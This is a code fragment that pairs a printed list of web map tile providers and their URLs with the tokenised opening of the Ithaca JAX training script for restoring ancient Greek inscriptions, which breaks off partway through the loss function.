subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='reduced.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.reducedNight') basicMap=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='basetile' language='eng' format='png8' size='256' name='HERE.basicMap') mapLabels=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='labeltile' language='eng' format='png' size='256' name='HERE.mapLabels') trafficFlow=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='traffic' variant='normal.day' max_zoom=20 type='flowtile' language='eng' format='png8' size='256' name='HERE.trafficFlow') carnavDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='carnav.day.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.carnavDayGrey') hybridDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDay') hybridDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayMobile') hybridDayTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.day.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayTransit') hybridDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.grey.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayGrey') pedestrianDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='pedestrian.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.pedestrianDay') pedestrianNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='pedestrian.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.pedestrianNight') satelliteDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='satellite.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.satelliteDay') terrainDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='terrain.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.terrainDay') terrainDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='terrain.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.terrainDayMobile')) FreeMapSK=TileProvider(url='http://t{s}.freemap.sk/T/{z}/{x}/{y}.jpeg' min_zoom=8 max_zoom=16 subdomains='1234' bounds=[[47.204642 15.996093] [49.830896 22.576904]] attribution='(C) OpenStreetMap contributors, vizualization CC-By-SA 2.0 Freemap.sk' name='FreeMapSK') MtbMap=TileProvider(url='http://tile.mtbmap.cz/mtbmap_tiles/{z}/{x}/{y}.png' attribution='(C) OpenStreetMap contributors & USGS' name='MtbMap') CartoDB=Bunch(Positron=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_all' name='CartoDB.Positron') PositronNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_nolabels' name='CartoDB.PositronNoLabels') PositronOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_only_labels' name='CartoDB.PositronOnlyLabels') DarkMatter=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_all' name='CartoDB.DarkMatter') DarkMatterNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_nolabels' name='CartoDB.DarkMatterNoLabels') DarkMatterOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_only_labels' name='CartoDB.DarkMatterOnlyLabels') Voyager=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager' name='CartoDB.Voyager') VoyagerNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_nolabels' name='CartoDB.VoyagerNoLabels') VoyagerOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_only_labels' name='CartoDB.VoyagerOnlyLabels') VoyagerLabelsUnder=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_labels_under' name='CartoDB.VoyagerLabelsUnder')) HikeBike=Bunch(HikeBike=TileProvider(url='https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors' variant='hikebike' name='HikeBike.HikeBike') HillShading=TileProvider(url='https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png' max_zoom=15 attribution='(C) OpenStreetMap contributors' variant='hillshading' name='HikeBike.HillShading')) BasemapAT=Bunch(basemap=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=20 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='geolandbasemap' name='BasemapAT.basemap') grau=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmapgrau' name='BasemapAT.grau') overlay=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmapoverlay' name='BasemapAT.overlay') highdpi=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='jpeg' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmaphidpi' name='BasemapAT.highdpi') orthofoto=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=20 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='jpeg' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmaporthofoto30cm' name='BasemapAT.orthofoto')) nlmaps=Bunch(standaard=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaart' name='nlmaps.standaard') pastel=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaartpastel' name='nlmaps.pastel') grijs=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaartgrijs' name='nlmaps.grijs') luchtfoto=TileProvider(url='https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts/1.0.0/2016_ortho25/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' name='nlmaps.luchtfoto')) NASAGIBS=Bunch(ModisTerraTrueColorCR=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=9 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_CorrectedReflectance_TrueColor' name='NASAGIBS.ModisTerraTrueColorCR') ModisTerraBands367CR=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=9 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_CorrectedReflectance_Bands367' name='NASAGIBS.ModisTerraBands367CR') ViirsEarthAtNight2012=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=8 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='VIIRS_CityLights_2012' name='NASAGIBS.ViirsEarthAtNight2012') ModisTerraLSTDay=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=7 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Land_Surface_Temp_Day' opacity=0.75 name='NASAGIBS.ModisTerraLSTDay') ModisTerraSnowCover=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=8 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Snow_Cover' opacity=0.75 name='NASAGIBS.ModisTerraSnowCover') ModisTerraAOD=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=6 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Aerosol' opacity=0.75 name='NASAGIBS.ModisTerraAOD') ModisTerraChlorophyll=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=7 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Chlorophyll_A' opacity=0.75 name='NASAGIBS.ModisTerraChlorophyll')) NLS=TileProvider(url='https://nls-{s}.tileserver.com/nls/{z}/{x}/{y}.jpg' attribution='National Library of Scotland Historic Maps' bounds=[[49.6 -12] [61.7 3]] min_zoom=1 max_zoom=18 subdomains='0123' name='NLS') JusticeMap=Bunch(income=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='income' name='JusticeMap.income') americanIndian=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='indian' name='JusticeMap.americanIndian') asian=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='asian' name='JusticeMap.asian') black=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='black' name='JusticeMap.black') hispanic=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='hispanic' name='JusticeMap.hispanic') multi=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='multi' name='JusticeMap.multi') nonWhite=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='nonwhite' name='JusticeMap.nonWhite') white=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='white' name='JusticeMap.white') plurality=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='plural' name='JusticeMap.plurality')) Wikimedia=TileProvider(url='https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png' attribution='Wikimedia' min_zoom=1 max_zoom=19 name='Wikimedia') GeoportailFrance=Bunch(parcels=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=20 apikey='choisirgeoportail' format='image/png' style='bdparcellaire' variant='CADASTRALPARCELS.PARCELS' name='GeoportailFrance.parcels') ignMaps=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=18 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='GEOGRAPHICALGRIDSYSTEMS.MAPS' name='GeoportailFrance.ignMaps') maps=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=18 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='GEOGRAPHICALGRIDSYSTEMS.MAPS.SCAN-EXPRESS.STANDARD' name='GeoportailFrance.maps') orthos=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=19 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='ORTHOIMAGERY.ORTHOPHOTOS' name='GeoportailFrance.orthos')) OneMapSG=Bunch(Default=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Default' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Default') Night=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Night' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Night') Original=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Original' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Original') Grey=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Grey' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Grey') LandLot=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='LandLot' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.LandLot')))<line_sep>
# Copyright 2021 the Ithaca Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Ithaca: Restoring and attributing ancient texts with deep neural networks."""<import_stmt>bz2<import_stmt>distutils<import_stmt>functools<import_stmt>glob<import_stmt>os<import_stmt>pickle<import_from_stmt>absl app<import_from_stmt>absl flags<import_from_stmt>absl logging<import_stmt>dataloader<import_from_stmt>ithaca.models.model Model<import_from_stmt>ithaca.util.alphabet GreekAlphabet<import_from_stmt>ithaca.util.loss categorical_kl_divergence<import_from_stmt>ithaca.util.loss cross_entropy_label_smoothing_loss<import_from_stmt>ithaca.util.loss cross_entropy_loss<import_from_stmt>ithaca.util.loss cross_entropy_mask_loss<import_from_stmt>ithaca.util.loss date_loss_l1<import_from_stmt>ithaca.util.optim adaptive_grad_clip<import_from_stmt>ithaca.util.optim linear_warmup_and_sqrt_decay<import_from_stmt>ithaca.util.optim linear_weight<import_from_stmt>ithaca.util.region_names load_region_maps<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_from_stmt>jaxline experiment<import_from_stmt>jaxline platform<import_from_stmt>jaxline utils<as>jl_utils<import_stmt>numpy<as>np<import_stmt>optax<import_stmt>tensorflow_datasets.public_api<as>tfds<line_sep>FLAGS=flags.FLAGS<class_stmt>Experiment(experiment.AbstractExperiment)<block_start>"""Ithaca experiment."""<line_sep># Holds a map from object properties that will be checkpointed to their name # within a checkpoint. Currently it is assume that these are all sharded # device arrays. CHECKPOINT_ATTRS={'_params':'params' '_opt_state':'opt_state' }<def_stmt>__init__ self mode init_rng config<block_start>"""Initializes experiment."""<line_sep>super(Experiment self).__init__(mode=mode)<line_sep>self.mode=mode<line_sep>self.init_rng=init_rng<line_sep>self.config=config<line_sep># Same random key on each device. self._rng_key=jl_utils.bcast_local_devices(self.init_rng)<line_sep># Checkpointed experiment state. self._params=<none><line_sep>self._opt_state=<none><line_sep># Input pipelines. self._train_input=<none><line_sep>self._eval_input=<none><line_sep># Forward and update functions. self.forward=Model(**self.config.model)<line_sep>self._update_func=jax.pmap(self._update_func axis_name='i' donate_argnums=(0 1))<line_sep>self._learning_rate_fn=functools.partial(linear_warmup_and_sqrt_decay max_lr=self.config.optimizer.kwargs.learning_rate warmup_steps=self.config.optimizer.warmup)<line_sep>self._opt_init,self._opt_update=self.optimizer()<if_stmt>'use_jit'<in>self.config.evaluation<and>self.config.evaluation.use_jit<block_start>self._eval_batch=jax.jit(self._eval_batch)<block_end># Create alphabet alphabet_kwargs=dict(self.config.alphabet)<line_sep>wordlist_path=alphabet_kwargs.pop('wordlist_path')<with_stmt>open(wordlist_path 'r')<as>f<block_start>self._alphabet=GreekAlphabet(wordlist_file=f **alphabet_kwargs)<block_end># Create region mapping self._region_map={'main':<none> 'sub':<none>}<if_stmt>self.config.dataset.region_main_path<block_start><with_stmt>open(self.config.dataset.region_main_path 'r')<as>f<block_start>self._region_map['main']=load_region_maps(f)<block_end><block_end><if_stmt>self.config.dataset.region_sub_path<block_start><with_stmt>open(self.config.dataset.region_sub_path 'r')<as>f<block_start>self._region_map['sub']=load_region_maps(f)<block_end><block_end><block_end><def_stmt>optimizer self<block_start>config_opt=self.config.optimizer<line_sep>kwargs=config_opt.kwargs.to_dict()<line_sep>kwargs['learning_rate']=self._learning_rate_fn<line_sep>opt=getattr(optax config_opt.name)(**kwargs)<if_stmt>hasattr(config_opt 'clip_adaptive')<and>config_opt.clip_adaptive<block_start><if_stmt>config_opt.clip_level<g>0.<block_start>opt=optax.chain(adaptive_grad_clip(config_opt.clip_level) opt)<block_end><block_end><elif_stmt>config_opt.clip_level<g>0.<block_start>opt=optax.chain(optax.clip_by_global_norm(config_opt.clip_level) opt)<block_end><return>opt<block_end># _ _ # | |_ _ __ __ _(_)_ __ # | __| '__/ _` | | '_ \ # | |_| | | (_| | | | | | # \__|_| \__,_|_|_| |_| # <def_stmt>step self global_step rng **unused_args<block_start>"""See base class."""<if_stmt>self._train_input<is><none><block_start>self._initialize_train(rng)<block_end>batch=next(self._train_input)<line_sep>(self._params self._opt_state scalars)=(self._update_func(self._params self._opt_state global_step batch rng))<line_sep>scalars=jl_utils.get_first(scalars)<line_sep><return>scalars<block_end><def_stmt>_initialize_train self rng# Check we haven't already restored params <block_start><if_stmt>self._params<is><none><block_start>logging.info('Initializing parameters rather than restoring from checkpoint.')<line_sep>batch=next(self._build_train_input())<line_sep>rng=jl_utils.get_first(rng)<line_sep>params_rng,dropout_rng=jax.random.split(rng)<line_sep>params_rng=jl_utils.bcast_local_devices(params_rng)<line_sep>dropout_rng=jl_utils.bcast_local_devices(dropout_rng)<line_sep>init_net=jax.pmap(functools.partial(self.forward.init is_training=<true>))<line_sep>self._params=init_net({'params':params_rng 'dropout':dropout_rng} text_char=batch['text_char'] text_word=batch['text_word'])<line_sep>init_opt=jax.pmap(self._opt_init)<line_sep>self._opt_state=init_opt(self._params)<line_sep>self._train_input=jl_utils.py_prefetch(self._build_train_input)<line_sep>self._train_input=jl_utils.double_buffer_on_gpu(self._train_input)<block_end><block_end><def_stmt>_build_train_input self<block_start>"""See base class."""<line_sep>num_devices=jax.device_count()<line_sep>global_batch_size=self.config.training.batch_size<line_sep>per_device_batch_size,ragged=divmod(global_batch_size num_devices)<line_sep>logging.info('num_devices: %d, per_device_batch_size: %d, global_batch_size: %d' num_devices per_device_batch_size global_batch_size)<if_stmt>ragged<block_start><raise>ValueError(f'Global batch size {global_batch_size} must be divisible by '<concat>f'num devices {num_devices}')<block_end>config_dataset=self.config.dataset<with_stmt>open(config_dataset.dataset_path)<as>dataset_file<block_start>ds=dataloader.loader_tf(per_device_batch_size config_dataset self._region_map alphabet=self._alphabet dataset_file=dataset_file mode='train')<block_end>ds=ds.batch(jax.local_device_count())<line_sep><return>iter(tfds.as_numpy(ds))<block_end><def_stmt>_loss_fn self params batch global_step rng<block_start>text_char=batch['text_char']<line_sep>text_word=batch['text_word']<line_sep>text_unmasked=batch['text_unmasked']<line_sep>text_mask=batch['text_mask']<line_sep>next_sentence_mask=batch['next_sentence_mask']<line_sep>next_sentence_label=batch['next_sentence_label']<line_sep>subregion=batch['region_sub_id']<line_sep>date_min=batch['date_min']<line_sep>date_max=batch['date_max']<line_sep>date_dist=batch['date_dist']<line_sep>date_available=batch['date_available']<line_sep>eps=1e-6<line_sep>(date_pred subregion_logits mask_logits nsp_logits)=self.forward.apply(params text_char=text_char text_word=text_word text_char_onehot=<none> text_word_onehot=<none> is_training=<true> rngs={'dropout':rng})<line_sep>date_loss=0.<line_sep>subregion_loss=0.<line_sep>subregion_accuracy=0.<line_sep>mask_loss=0.<line_sep>mask_accuracy=0.<line_sep>nsp_loss=0.<line_sep>nsp_accuracy=0.<line_sep># Date loss 